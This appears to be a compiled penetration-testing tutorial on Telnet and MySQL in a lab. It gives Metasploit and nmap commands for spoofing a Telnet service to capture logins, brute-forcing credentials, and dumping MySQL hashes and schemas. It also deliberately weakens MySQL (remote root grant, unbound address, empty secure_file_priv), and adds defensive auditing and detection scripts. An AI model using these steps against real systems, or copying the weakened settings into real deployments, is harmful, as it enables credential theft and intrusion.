Penetration Testing on Telnet (Port 23)


Telnet is a TCP/IP network terminal emulation program that lets you reach another Internet or local area network device by logging in to the remote machine. Telnet is a client-server protocol that uses TCP port 23. Using Telnet, you can also test whether ports on a remote system are open.
Requirements
Telnet Server: Ubuntu
Attacker system: Kali Linux
Table of Contents
·         Installation & Configuration
·         Connecting to Telnet
·         Banner Grabbing of Telnet
·         Banner Grabbing through Telnet
·         MITM: Telnet Spoofing
·         Brute Forcing
·         Telnet credential Sniffing

Telnet is an unencrypted and therefore insecure protocol, and we recommend using SSH instead, as it is encrypted. Still, you should understand all the protocols, and telnet is one of the protocols through which you can connect to another system in your local network. So let's start with the installation, which is quite simple.
Run the following command with root access on your Ubuntu system to install Telnet:

apt-get install telnetd


Upon completion of the installation, you can test the Telnet service status by using the following command.
systemctl status inetd
And with the output shown in the screenshot we can observe that the service is active in Ubuntu.


Test Telnet Connection from Windows machine
Now we will connect to telnet with PuTTY. Enter the IP address of the Ubuntu machine, set the port to 23 to connect over telnet, and click Open.


When we click Open, a new window pops up asking for the Ubuntu username and password; after submitting the right values we are logged in to Ubuntu.


Connecting to Telnet
Telnet is installed; it's time to connect to the remote Telnet server. Log in to your Kali machine and run the following command. It will ask for the username and password, and after providing the right values you are connected.
telnet 192.168.0.196


Banner Grabbing of Telnet
Now that the telnet setup is ready, we run a version scan to find out which telnet version is running on Ubuntu; as shown in the screenshot below, the scan returned the version.

Banner Grabbing through Telnet
Telnet also plays a significant role in grabbing the banners of other services on the target network.
To find the version of the SSH service running on the target computer, open a terminal in Kali Linux and run the following command:
telnet 192.168.0.196 22


Similarly, the version of an SMTP server and the validity of its user accounts can also be checked with telnet. Run the command below to find out the version and then verify a user:
telnet 192.168.0.136 25
You will note from the picture that the server answered with the banner "220 metasploitable.localdomain ESMTP Postfix", identifying the mail server running on the target computer.
If you receive reply code 550, the user account is unknown. You can check whether a user account is valid with the following command:
vrfy msfadmin
If reply code 250, 251 or 252 is received, the server has acknowledged the request and the user account is valid.
If you receive reply code 550, the account is invalid, as shown in the picture.


MITM: Telnet Spoofing
An attacker may use telnet spoofing as a man-in-the-middle attack in order to capture telnet login credentials.
This is achieved by running a bogus telnet service in the network. Open a terminal in Kali Linux, load the Metasploit framework, and type the following commands to start the server; here we have also set the banner to "Welcome to Hacking Articles", which you can change to anything you like.
use auxiliary/server/capture/telnet
set srvhost 192.168.0.102
set banner Welcome to Hacking Articles
exploit


Now, as soon as a user finds telnet running on this host and tries to connect, they submit their credentials and the login fails.


But here on the server we can see the logs, which show who tried to connect over telnet.


Brute Forcing
An attacker may also attempt to brute force the credentials. This Metasploit module tests telnet logins and records successful connections on a variety of devices.
use auxiliary/scanner/telnet/telnet_login
set rhosts 192.168.0.196
set user_file /root/Desktop/user.txt
set pass_file /root/Desktop/pass.txt
set stop_on_success true
exploit

As you can observe, it has obtained valid credentials for telnet and, moreover, opened a session on the victim's shell.
sessions -u 2
Once we have the meterpreter session on the victim, we run the sysinfo command to confirm that we are on the Ubuntu machine.


Telnet Credential Sniffing
By default Telnet does not encrypt any of the data sent over the connection, not even passwords, so it is always possible to eavesdrop on the communication and later use the password for malicious purposes; anyone with network access between the two hosts can intercept the packets between source and destination and obtain the authentication details, password and data.
From the image below you can read the username raj and password 123 used for Telnet, along with the complete contents of the packets travelling between source and destination.
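What the sniffer sees is not magic: the only thing standing between an eavesdropper and the password is Telnet's option negotiation, which is trivial to strip. The following is an added example (not code from the original article) that reconstructs a Telnet login from a captured byte stream: it removes IAC sequences (RFC 854) and pairs each server prompt with the line the client typed in reply, which is exactly the logic a network sensor uses to alert on cleartext logins. The capture below is constructed by hand for the example, not taken from a real pcap.

```python
"""Reconstruct the cleartext of a captured Telnet login.

Added example, not code from the original article. It strips Telnet
option negotiation (IAC sequences, RFC 854) from both directions of a
captured session and pairs each server prompt with the line the client
typed in reply. The capture below is constructed for the example.
"""
import re

IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240

# Constructed capture: (direction, raw bytes on the wire), in arrival order.
CAPTURE = [
    ("server", b"\xff\xfd\x18\xff\xfd\x20"),                 # IAC DO TERMINAL-TYPE, IAC DO NAWS
    ("client", b"\xff\xfc\x18\xff\xfc\x20"),                 # IAC WONT ..., IAC WONT ...
    ("server", b"\xff\xfb\x01\xff\xfb\x03ubuntu login: "),   # IAC WILL ECHO, IAC WILL SGA, prompt
    ("client", b"r"), ("client", b"a"), ("client", b"j"), ("client", b"\r\x00"),
    ("server", b"raj\r\nPassword: "),
    ("client", b"1"), ("client", b"2"), ("client", b"3"), ("client", b"\r\x00"),
    ("server", b"\r\nraj@ubuntu:~$ "),
]

PROMPT_RE = re.compile(r"(login|username|password)\s*:\s*$", re.IGNORECASE)


def strip_telnet_negotiation(data: bytes) -> bytes:
    """Return only the application bytes, dropping IAC command sequences."""
    out = bytearray()
    i, n = 0, len(data)
    while i < n:
        if data[i] != IAC:
            out.append(data[i])
            i += 1
        elif i + 1 < n and data[i + 1] == IAC:
            out.append(IAC)             # IAC IAC is an escaped literal 0xFF
            i += 2
        elif i + 1 < n and data[i + 1] in (DO, DONT, WILL, WONT):
            i += 3                      # IAC <cmd> <option>
        elif i + 1 < n and data[i + 1] == SB:
            end = data.find(bytes([IAC, SE]), i + 2)   # skip subnegotiation up to IAC SE
            i = n if end == -1 else end + 2
        else:
            i += 2                      # other two-byte commands (NOP, GA, ...)
    return bytes(out)


def recover_login(capture) -> dict:
    """Pair each server prompt with the client's reply line.

    Clients in character-at-a-time mode send one byte per segment and end a
    line with CR NUL or CR LF, so client bytes are buffered until a full line
    is available.
    """
    fields, pending, client_buf = {}, None, ""
    for direction, raw in capture:
        text = strip_telnet_negotiation(raw).decode("latin-1")
        if direction == "server":
            match = PROMPT_RE.search(text)
            if match:
                pending = match.group(1).lower()
            continue
        client_buf += text
        lines = client_buf.replace("\r\x00", "\n").replace("\r\n", "\n")
        while "\n" in lines:
            line, lines = lines.split("\n", 1)
            if pending:
                fields[pending] = line
                pending = None
        client_buf = lines
    return fields


if __name__ == "__main__":
    print(recover_login(CAPTURE))   # {'login': 'raj', 'password': '123'}
```

The same reconstruction works on a real capture once the two TCP directions are split out (Wireshark's "Follow TCP Stream" does that for you); the point is that nothing in the protocol hides the password, so the only fixes are moving the service to SSH or confining port 23 to a segment where no third party can listen.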


Telnet implementations do not support the Transport Layer Security (TLS) and Simple Authentication and Security Layer (SASL) extensions. For this reason the Secure Shell (SSH) protocol, first released in 1995, replaced Telnet.

Penetration Testing on MYSQL (Port 3306)


In this article we will learn how to make the MySQL port vulnerable and then secure it, as part of penetration testing port 3306. To fully understand how to secure a service on a port, you first have to understand how to make it vulnerable and then test it, because if you don't understand what can be exploited and how, you will always fail to secure it.

Table of Contents
·         Introduction to MySQL-Server
·         Installation of MySQL-Server
·         Pen testing MySQL-Server

Introduction to MySQL-Server
MySQL Server is the core of MySQL; it handles most of the database instructions (commands). MySQL Server is available both as a separate program for use in a networked client-server environment and as a library that can be embedded (linked) into separate applications. MySQL ships with several utility programs that support the administration of MySQL databases. Commands are sent to MySQL Server by means of the MySQL client, which is installed on a PC. It runs on port 3306 by default.

Installation of MySQL-server
The first thing to do is to install MySQL server; to do so, use the following command:

apt install mysql-server


Further, use the following command to check whether the server is up and running or not.
netstat -tnl


Pentesting MySQL-Server
Scanning MySQL & Connecting to MySQL
Now, as you can see, the MySQL server is working properly. But if you scan the port from another host, it will show as closed.
nmap -p3306 192.168.1.108


The port appears closed because the server is listening only on the local address: when scanned from any other IP it shows as closed even though the service is running. This is caused by the default setting in the MySQL configuration file, bind-address = 127.0.0.1, which means the port shows as open only when scanned from that IP, as in the image below. To change this, open the configuration file with the following command:
nano /etc/mysql/mysql.conf.d/mysqld.cnf


To change this setting, just add a '#' in front of the 'bind-address' line to comment it out, as shown in the image below:


Now if you scan it, it will show you that the port is open.
nmap -p3306 192.168.1.108
But if you now try to log in through this port, you will get an error. This happens because the MySQL server does not grant privileges to users connecting from other IPs.


This error can be removed by logging in to the MySQL server locally and running the following commands, which grant all privileges to the root user when logging in from any IP:
GRANT ALL PRIVILEGES ON *.* TO root@'%' IDENTIFIED BY '123';
FLUSH PRIVILEGES;
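The grant above is what turns the rest of this article from "open port" into "full compromise": it is root, from any host, with every privilege on every database. As an added example (not code from the original article), the following parses GRANT statements in the form typed above or printed by SHOW GRANTS and flags the properties that make such a grant dangerous. The least-privilege grant for the constructed 'app' account is an assumption about what an application might need, not something the article specifies.

```python
"""Flag over-broad MySQL grants such as the root@'%' grant above.

Added example, not from the original article. Parses GRANT statements as
typed in the article or as printed by SHOW GRANTS and reports a wildcard
host, ALL PRIVILEGES on *.*, FILE access, remote root and WITH GRANT OPTION.
"""
import re

GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<obj>\S+)\s+TO\s+"
    r"(?P<user>[^@\s]+)@(?P<host>\S+)(?P<rest>.*)$", re.IGNORECASE)

# Constructed statements: the article's grant and an assumed least-privilege alternative.
ARTICLE_GRANT = "GRANT ALL PRIVILEGES ON *.* TO root@'%' IDENTIFIED BY '123';"
LEAST_PRIV_GRANT = "GRANT SELECT, INSERT, UPDATE ON ignite.* TO 'app'@'192.168.1.10';"


def _unquote(s: str) -> str:
    return s.strip("'\"`")


def parse_grant(statement: str) -> dict:
    """Split one GRANT statement into privileges, object, account and options."""
    m = GRANT_RE.match(statement.strip().rstrip(";"))
    if not m:
        raise ValueError("not a GRANT statement: %r" % statement)
    return {
        "privs": {p.strip().upper() for p in m.group("privs").split(",")},
        "object": m.group("obj"),
        "user": _unquote(m.group("user")),
        "host": _unquote(m.group("host")),
        "grant_option": "WITH GRANT OPTION" in m.group("rest").upper(),
    }


def audit_grant(statement: str) -> list:
    """Return finding codes for one GRANT statement; an empty list means nothing to flag."""
    g = parse_grant(statement)
    findings = []
    if "%" in g["host"]:
        findings.append("any-host")      # '%' accepts logins from any address
    if g["object"] == "*.*" and g["privs"] & {"ALL", "ALL PRIVILEGES"}:
        findings.append("global-all")    # superuser on every database
    if g["privs"] & {"ALL", "ALL PRIVILEGES", "FILE"}:
        findings.append("file-access")   # FILE drives LOAD_FILE / SELECT INTO DUMPFILE, bounded only by secure_file_priv
    if g["user"] == "root" and g["host"] not in ("localhost", "127.0.0.1", "::1"):
        findings.append("remote-root")
    if g["grant_option"]:
        findings.append("grant-option")  # account can hand its privileges to others
    return findings


if __name__ == "__main__":
    for stmt in (ARTICLE_GRANT, LEAST_PRIV_GRANT):
        print(stmt, "->", audit_grant(stmt) or "ok")
```

Run against the article's grant this reports any-host, global-all, file-access and remote-root; the least-privilege grant reports nothing. Feeding it the output of SHOW GRANTS FOR each account in mysql.user gives a quick inventory of which accounts would make the later modules in this article (schema dump, hash dump, writable-directory and file enumeration) succeed.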


Now, when you try and login, you will be successful as shown in the image below:


Let's scan the port again to grab as many details as we can, such as its banner, MAC address, etc.
nmap -sV -p3306 192.168.1.108


MySQL Brute-Force Attack
One can also brute force the port using Metasploit. This module simply queries the MySQL instance for a specific user/pass combination. Open a terminal in Kali, type 'msfconsole', and then use the following commands to start the brute-force login:
use auxiliary/scanner/mysql/mysql_login
set rhosts 192.168.1.108
set user_file /root/Desktop/user.txt
set pass_file /root/Desktop/pass.txt
exploit


Running SQL Queries without Logging into MySQL
This module allows simple SQL statements to be executed against a MySQL instance, given the appropriate credentials. For this, type:
use auxiliary/admin/mysql/mysql_sql
set rhosts 192.168.1.108
set username root
set password 123
set sql show databases
exploit


Extract MySQL Schemadump Information
Our next module extracts the schema information from a MySQL DB server. For this, type:
use auxiliary/scanner/mysql/mysql_schemadump
set rhosts 192.168.1.108
set username root
set password 123
exploit


Extracting Logins from MySQL Server
To extract the usernames and password hashes from a MySQL server and store them for later cracking, use the following module:
use auxiliary/scanner/mysql/mysql_hashdump
set rhosts 192.168.1.108
set username root
set password 123
exploit


Once the above module completes, you can see its results in the file it creates, as shown in the image below:


Checking Writable Directories
Another attack that can be executed against the MySQL port is to check which directories are writable. By default this attack cannot be performed; only if the admin has made the following configuration change can an attacker check for writable directories.
nano /etc/mysql/mysql.conf.d/mysqld.cnf
Then add secure_file_priv="" at the end of the file.
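Both of the configuration changes this article makes (commenting out bind-address earlier, and emptying secure_file_priv here) are one-line edits that are easy to miss in a review. As an added example (not code from the original article), the following reads the [mysqld] section the way the server does, with comments stripped and '-' and '_' in option names treated alike, and reports those weakenings along with a non-default port. Both configs below are constructed for the example, and the hardened secure-file-priv path is an assumption, not the package default.

```python
"""Audit a mysqld.cnf for the settings this article changes.

Added example, not from the original article. Flags bind-address commented
out or set to every interface, secure_file_priv="" and a non-default port.
Both configs are constructed; the hardened values are assumptions.
"""

WEAK_CNF = """
[mysqld]
user = mysql
# bind-address = 127.0.0.1
port = 3306
secure_file_priv=""
"""

HARDENED_CNF = """
[mysqld]
user = mysql
bind-address = 127.0.0.1
port = 3306
secure-file-priv = /var/lib/mysql-files
"""


def parse_mysqld_section(text: str) -> dict:
    """Return option -> value for the [mysqld] section; option names normalised to snake_case."""
    settings, section = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # a leading '#' comments the option out
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "mysqld":
            continue
        key, _, value = line.partition("=")
        settings[key.strip().lower().replace("-", "_")] = value.strip().strip("\"'")
    return settings


def audit(settings: dict) -> list:
    """Return (severity, message) findings for the parsed [mysqld] settings."""
    findings = []
    bind = settings.get("bind_address")
    if "skip_networking" in settings:
        pass                                          # no TCP listener at all
    elif bind is None:
        findings.append(("high", "bind-address is not set: the server uses its default, "
                                 "which on MySQL 5.6 and later is every interface"))
    elif bind in ("0.0.0.0", "::", "*"):
        findings.append(("high", "bind-address=%s exposes the service on every interface" % bind))
    sfp = settings.get("secure_file_priv")
    if sfp == "":
        findings.append(("high", 'secure_file_priv="" lets any account with the FILE privilege read and '
                                 "write files anywhere the server can (LOAD_FILE, SELECT INTO DUMPFILE)"))
    elif sfp is None:
        findings.append(("info", "secure_file_priv is not set: the server default applies; confirm with SHOW VARIABLES"))
    port = settings.get("port", "3306")
    if port != "3306":
        findings.append(("info", "non-default port %s: a version scan (nmap -sV) still identifies MySQL" % port))
    return findings


if __name__ == "__main__":
    for name, cnf in (("weak", WEAK_CNF), ("hardened", HARDENED_CNF)):
        print(name, audit(parse_mysqld_section(cnf)))
```

Setting secure_file_priv to NULL disables file import and export entirely, and a directory value confines it to that directory; only the empty string removes the limit, which is what the writable-directory and file enumeration modules below depend on.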


Now if you run the following module through Metasploit, it will enumerate writable directories using the MySQL SELECT INTO DUMPFILE feature.
use auxiliary/scanner/mysql/mysql_writable_dirs
set rhosts 192.168.1.108
set username root
set password 123
set dir_list /root/dir.txt
exploit


Enumerating Files
To take the MySQL pentest further, you can use the following module to enumerate files and directories using the MySQL load_file feature.
use auxiliary/scanner/mysql/mysql_file_enum
set rhosts 192.168.1.108
set username root
set password 123
set file_list /root/dir.txt
exploit


Changing the Port
Next comes port forwarding, i.e. moving the service to a different port. This method is used to protect the port from attacks. To change the port, open the configuration file with the following command:
nano /etc/mysql/mysql.conf.d/mysqld.cnf
Then change the port number to whichever you like. For instance, we have used 4033 here.

After changing the port, when you scan the host again, it shows the MySQL service running on the new port instead of the default one.


This is how you learn to exploit and secure MySQL Server.

MySQL Penetration Testing with NMAP

In this article we discuss MySQL penetration testing using Nmap, where you will learn how to retrieve database information such as database names, table records, usernames, passwords and so on.

MySQL is an open-source relational database management system that uses Structured Query Language to manage database records.

Let's begin!

Scanning for port 3306

Open a terminal and type the following command to check whether the MySQL service is running on the target system; by default MySQL listens on port 3306.
nmap -sT 192.168.1.216

From the image you can observe that port 3306 is open for the MySQL service; now let's enumerate it.


Retrieve mysql information
Now type another command to retrieve MySQL information such as version, protocol, etc.:

nmap --script=mysql-info 192.168.1.216


The above command connects to the MySQL server and prints information such as the protocol: 10, version number: 5.5.57-0ubuntu0.14.04.1, thread ID: 159, status: autocommit, capabilities, and the password salt, as shown in the image below.
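Everything mysql-info prints comes from the single handshake packet the server sends before the client has authenticated, so no credentials are needed to learn the exact build. As an added example (not code from the original article or from Nmap), the following builds a protocol-10 handshake with the values the article reports and parses it back, decoding the one extra field a defender should look at: whether the CLIENT_SSL capability is advertised, i.e. whether the server offers TLS at all. The salt, capability set and plugin name in the sample are made up.

```python
"""Parse the MySQL initial handshake packet (protocol version 10).

Added example, not from the original article or from Nmap. The server sends
this packet before authentication, which is why mysql-info can report the
version, thread ID, status and salt without credentials. The sample packet
is constructed with build_handshake(); salt and capabilities are made up.
"""
import struct

CLIENT_SSL = 0x00000800               # server offers TLS if set
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_PLUGIN_AUTH = 0x00080000
SERVER_STATUS_AUTOCOMMIT = 0x0002


def build_handshake(version, thread_id, salt, capabilities, status,
                    plugin=b"mysql_native_password") -> bytes:
    """Assemble a protocol-10 handshake; used only to create the sample input."""
    assert len(salt) == 20
    body = bytes([10]) + version.encode() + b"\x00"        # protocol version, server version
    body += struct.pack("<I", thread_id)                   # connection/thread id
    body += salt[:8] + b"\x00"                             # auth-plugin-data part 1 + filler
    body += struct.pack("<H", capabilities & 0xFFFF)       # capability flags, lower 16 bits
    body += bytes([33])                                    # character set (33 = utf8_general_ci)
    body += struct.pack("<H", status)                      # status flags
    body += struct.pack("<H", capabilities >> 16)          # capability flags, upper 16 bits
    body += bytes([len(salt) + 1 if capabilities & CLIENT_PLUGIN_AUTH else 0])
    body += b"\x00" * 10                                   # reserved
    if capabilities & CLIENT_SECURE_CONNECTION:
        body += salt[8:] + b"\x00"                         # auth-plugin-data part 2
    if capabilities & CLIENT_PLUGIN_AUTH:
        body += plugin + b"\x00"
    return struct.pack("<I", len(body))[:3] + b"\x00" + body   # 3-byte length, sequence id 0


def parse_handshake(packet: bytes) -> dict:
    """Decode the fields mysql-info reports, plus whether TLS is on offer."""
    length = int.from_bytes(packet[:3], "little")
    p = packet[4:4 + length]
    if p[0] != 10:
        raise ValueError("unsupported protocol version %d" % p[0])
    end = p.index(b"\x00", 1)
    version = p[1:end].decode()
    pos = end + 1
    thread_id = struct.unpack_from("<I", p, pos)[0]
    pos += 4
    salt = p[pos:pos + 8]
    pos += 9                                               # 8 salt bytes + filler
    cap_lo, charset, status, cap_hi, auth_len = struct.unpack_from("<HBHHB", p, pos)
    pos += 8 + 10                                          # those fields + 10 reserved bytes
    capabilities = (cap_hi << 16) | cap_lo
    if capabilities & CLIENT_SECURE_CONNECTION:
        part2_len = max(13, auth_len - 8)
        salt += p[pos:pos + part2_len].rstrip(b"\x00")
        pos += part2_len
    plugin = None
    if capabilities & CLIENT_PLUGIN_AUTH:
        plugin = p[pos:p.index(b"\x00", pos)].decode()
    return {
        "protocol": 10,
        "version": version,
        "thread_id": thread_id,
        "autocommit": bool(status & SERVER_STATUS_AUTOCOMMIT),
        "salt": salt,
        "auth_plugin": plugin,
        "ssl_offered": bool(capabilities & CLIENT_SSL),
        "charset": charset,
    }


# Constructed sample mimicking the values the article reports.
SAMPLE = build_handshake("5.5.57-0ubuntu0.14.04.1", 159, b"abcdefghijklmnopqrst",
                         CLIENT_SECURE_CONNECTION | CLIENT_PLUGIN_AUTH | 0x0001,
                         SERVER_STATUS_AUTOCOMMIT)

if __name__ == "__main__":
    print(parse_handshake(SAMPLE))
```

A server whose handshake lacks CLIENT_SSL sends every later query and result in the clear, so brute-forced credentials are not the only thing a sniffer on the path would collect; that flag is worth checking on any instance that, like the one in this article, has been bound to a routable address.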


Brute force attack
This command uses dictionaries of usernames and passwords and tries each combination in a brute-force attack against MySQL.

nmap -p 3306 --script mysql-brute --script-args userdb=/root/Desktop.lst,passdb=/root/Desktop/pass.lst 192.168.1.216

From the image you can observe that it found the valid credentials root:toor. These credentials allow logging directly into the MySQL server.
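The telnet_login and mysql_login modules used earlier and the mysql-brute script here all leave the same trace on the server: a burst of failed logins from one source address. As an added example (not code from the original article), the following detector parses the failure line that login(1) writes to auth.log for telnet sessions and the "Access denied" line MySQL writes to its error log when its warning verbosity includes them, and raises one alert per source once failures inside a sliding window reach a threshold. Both line formats are assumed from the programs' message templates, and every log line below is constructed for the example.

```python
"""Detect telnet and MySQL password guessing from the servers' own logs.

Added example, not from the original article. Parses login(1) failures in
auth.log and MySQL "Access denied" error-log lines (both formats assumed)
and alerts when one source crosses a threshold inside a sliding window.
All sample lines are constructed.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

SAMPLE_LOG = """\
Jun  3 10:15:01 ubuntu login[1422]: FAILED LOGIN (1) on '/dev/pts/1' from '192.168.0.102' FOR 'raj', Authentication failure
Jun  3 10:15:03 ubuntu login[1422]: FAILED LOGIN (2) on '/dev/pts/1' from '192.168.0.102' FOR 'raj', Authentication failure
Jun  3 10:15:04 ubuntu login[1431]: FAILED LOGIN (1) on '/dev/pts/2' from '192.168.0.50' FOR 'raj', Authentication failure
Jun  3 10:15:06 ubuntu login[1422]: FAILED LOGIN (3) on '/dev/pts/1' from '192.168.0.102' FOR 'raj', Authentication failure
Jun  3 10:15:09 ubuntu login[1440]: FAILED LOGIN (1) on '/dev/pts/1' from '192.168.0.102' FOR 'admin', Authentication failure
Jun  3 10:15:11 ubuntu login[1440]: FAILED LOGIN (2) on '/dev/pts/1' from '192.168.0.102' FOR 'admin', Authentication failure
2020-06-03T10:16:02.000001Z 21 [Note] Access denied for user 'root'@'192.168.1.108' (using password: YES)
2020-06-03T10:16:02.400000Z 22 [Note] Access denied for user 'root'@'192.168.1.108' (using password: YES)
2020-06-03T10:16:03.100000Z 23 [Note] Access denied for user 'admin'@'192.168.1.108' (using password: YES)
2020-06-03T10:16:03.700000Z 24 [Note] Access denied for user 'root'@'192.168.1.108' (using password: YES)
2020-06-03T10:16:04.200000Z 25 [Note] Access denied for user 'root'@'192.168.1.108' (using password: NO)
"""

TELNET_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ login\[\d+\]: FAILED LOGIN \(\d+\) on '[^']*' "
    r"(?:from|FROM) '(?P<src>[^']+)' FOR '(?P<user>[^']*)'")
MYSQL_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d\.\d+Z) \d+ \[\w+\] "
    r"Access denied for user '(?P<user>[^']*)'@'(?P<src>[^']+)'")


def parse_line(line: str):
    """Return (service, timestamp, source, user) for a failed login, or None for other lines."""
    m = TELNET_RE.match(line)
    if m:
        # syslog timestamps carry no year; strptime fills in 1900, which is fine for windowing
        return "telnet", datetime.strptime(m["ts"], "%b %d %H:%M:%S"), m["src"], m["user"]
    m = MYSQL_RE.match(line)
    if m:
        return "mysql", datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S.%fZ"), m["src"], m["user"]
    return None


def detect_bruteforce(log_text: str, threshold: int = 5, window_s: int = 60) -> list:
    """Alert once per (service, source) when failures within window_s reach threshold."""
    recent, users, alerts, alerted = defaultdict(deque), defaultdict(set), [], set()
    for line in log_text.splitlines():
        event = parse_line(line)
        if event is None:
            continue
        service, ts, src, user = event
        key = (service, src)
        q = recent[key]
        q.append(ts)
        users[key].add(user)
        while q and (ts - q[0]).total_seconds() > window_s:   # drop failures outside the window
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"service": service, "src": src, "failures": len(q),
                           "users": sorted(users[key]), "last_seen": ts})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The single failure from 192.168.0.50 never reaches the threshold and produces no alert, while the two guessing bursts do; the list of usernames tried per source is what distinguishes a wordlist run from a user who mistyped a password.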


Retrieve mysql user names
This command fetches the MySQL user names with the help of the arguments mysqluser=root and mysqlpass=toor.
nmap -p 3306 --script=mysql-users 192.168.1.216 --script-args mysqluser=root,mysqlpass=toor

From the image below you can see that we found four user names: root, debian-sys-maint, sr, st.


Retrieve database names
This command fetches the MySQL database names with the help of the arguments mysqluser=root and mysqlpass=toor.
nmap -p 3306 --script=mysql-databases 192.168.1.216 --script-args mysqluser=root,mysqlpass=toor

From given below image you can read the name of created database such as ignite


This command performs the same task as above but retrieves the database names using the MySQL query "show databases".

nmap -p 3306 192.168.1.216 --script mysql-query --script-args "query=show databases,username=root,password=toor"

From given below image you can read the name of created database such as ignite


Retrieve mysql variable status ON/OFF
When we want to pass a value from one SQL statement to another, we store the value in a MySQL user-defined variable.
This command fetches the MySQL variable names with the help of the arguments mysqluser=root and mysqlpass=toor.

nmap -p 3306 --script=mysql-variables 192.168.1.216 --script-args mysqluser=root,mysqlpass=toor

From given image you can observe ON/OFF status for mysql variable.


Retrieve Password Hashes
This command dumps the password hashes from a MySQL server in a format suitable for cracking by tools such as John the Ripper.
nmap -p 3306 --script=mysql-dump-hashes 192.168.1.216 --script-args username=root,password=toor

From the image you can observe that it has dumped the password hashes of the respective users that we enumerated above.